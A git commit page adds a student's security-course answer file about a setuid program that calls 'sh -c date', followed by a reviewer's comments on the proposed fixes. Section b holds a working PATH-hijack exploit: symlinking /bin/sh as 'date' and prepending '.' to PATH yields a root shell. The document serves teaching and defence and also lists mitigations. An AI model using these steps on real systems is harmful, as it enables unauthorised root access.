author | Camil Staps | 2015-11-30 22:08:58 +0100 |
---|---|---|
committer | Camil Staps | 2015-11-30 22:08:58 +0100 |
commit | d7c4536c91ddd307fc9b99984ac49b5b5459b485 (patch) | |
tree | 135749c25cda6177b7712ae425d9559b625f20e0 /CamilStaps-s4498062-Assignment-2/ex1/ex1.txt | |
parent | Initial commit (diff) |
Assignment 2, 3
Diffstat (limited to 'CamilStaps-s4498062-Assignment-2/ex1/ex1.txt')
-rw-r--r-- | CamilStaps-s4498062-Assignment-2/ex1/ex1.txt | 21 |
1 files changed, 21 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt new file mode 100644 index 0000000..28c5e20 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-2/ex1/ex1.txt @@ -0,0 +1,21 @@ +a + Using strace -feprocess ./showdate we see the following interesting calls: + execve("/bin/sh", ["sh", "-c", "date"], [/* 37 vars */]) + execve("/bin/date", ["date"], [/* 37 vars */]) + +b + $ ln -s /bin/sh date + $ export PATH=.:$PATH + $ ./showdate + # id + uid=0(root) gid=0(root) groups=0(root),27(sudo),1001(camil) + +c + - Simply don't use execve for something as simple as this. + - The currently used system call is: + execve("/bin/sh", ["sh, "-c", "date"], [/* 37 vars */]) + This could be changed to: + execve("/bin/date", ...) + A nonprivileged user cannot change /bin/date. + - Drop privileges before executing execve. + |
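Review bot: In section c, the first bullet ("Simply don't use execve for something as simple as this") contradicts the second bullet, whose proposed fix is itself an execve call. The trace in section a shows that the weak point is `sh -c date` resolving `date` through the caller's PATH, not execve as such, so the bullet would be more accurate as "don't run date through a shell". The call quoted in c is also missing a closing quote (`["sh, "-c", "date"]`) compared with the same line in a. For the last bullet, it would help to say that privileges have to be dropped before the shell is spawned, and that this complements the absolute path rather than replacing it, since the demonstration in b only works because the shell runs with uid 0 and a user-controlled PATH.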